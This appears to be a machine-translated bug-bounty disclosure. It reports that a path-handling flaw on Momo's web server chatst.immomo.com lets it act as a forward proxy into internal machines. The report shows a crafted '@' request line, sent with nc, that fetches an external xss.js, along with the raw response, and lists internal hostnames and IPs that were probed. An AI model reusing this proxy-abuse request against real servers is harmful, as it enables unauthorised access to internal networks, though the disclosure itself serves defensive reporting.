If the Path of the Momo web server is improperly handled, it can be a forward proxy (idc machines/cannot access the office network)

If the Path of the Momo web server is improperly handled, it can be a forward proxy (idc machines/cannot access the office network)

The Path of a web server in Momo is not properly handled. It can be a forward proxy. It is an idc machine and can be worn in the idc, but cannot access the office network. (Partition _ tables)

The problematic web server is chatst.immomo.com: 80.

GET :@www.lijiejie.com/xss.js HTTP/1.1Host: chatst.immomo.com

, You can access www.lijiejie.com by proxy

[email protected]:~/test# echo -e "GET :@www.lijiejie.com/xss.js HTTP/1.1\r\nHost: chatst.immomo.com\r\n\r\n" | nc chatst.immomo.com 80HTTP/1.1 200 OKContent-Length: 51Expires: Tue, 27 Sep 2016 08:22:10 GMTServer: MOMOLast-Modified: Tue, 26 Jan 2016 07:40:04 GMTCache-Control: max-age=15552000Date: Thu, 31 Mar 2016 08:22:09 GMTContent-Type: application/octet-streamalert('XSS on ' + document.domain + '\n' + Date())

I tested several IP addresses and the office network cannot be connected:

office.wemomo.com             172.16.7.3hermes.wemomo.com             10.80.103.160

But I still cannot find it:

maven.wemomo.com              211.152.99.47

You cannot directly access the http://maven.wemomo.com web service, but the agent is OK.

Solution:

The web server correctly processes the path